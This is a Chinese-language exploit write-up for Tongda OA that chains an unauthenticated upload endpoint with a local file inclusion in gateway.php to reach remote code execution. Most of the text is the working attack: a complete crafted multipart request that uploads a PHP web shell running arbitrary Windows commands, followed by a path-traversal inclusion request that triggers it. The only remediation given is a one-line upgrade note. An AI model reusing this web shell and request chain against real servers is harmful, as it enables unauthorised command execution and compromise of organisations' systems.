通达OA未授权上传和文件包含RCE

一、漏洞情况
此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞
文件上传地址：
http://localhost:80/ispirit/im/upload.php
本地文件包含地址：
http://localhost:80/ispirit/interface/gateway.php

需要复现的朋友私信我，我分享链接给你
安装很简单，一路next就OK。

登录账号是:admin,密码为空。
登录以后，抓取任意数据包，将数据包修改为下面的数据

POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 656
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

重发以后，保存下面图片的名字,2008_13917698

使用hackbar，传递post参数
json={“url”:"/general/…/…/attach/im/2008/13917698.jpg"}&cmd=whoami

成功执行了命令。

修复建议：升级最新版本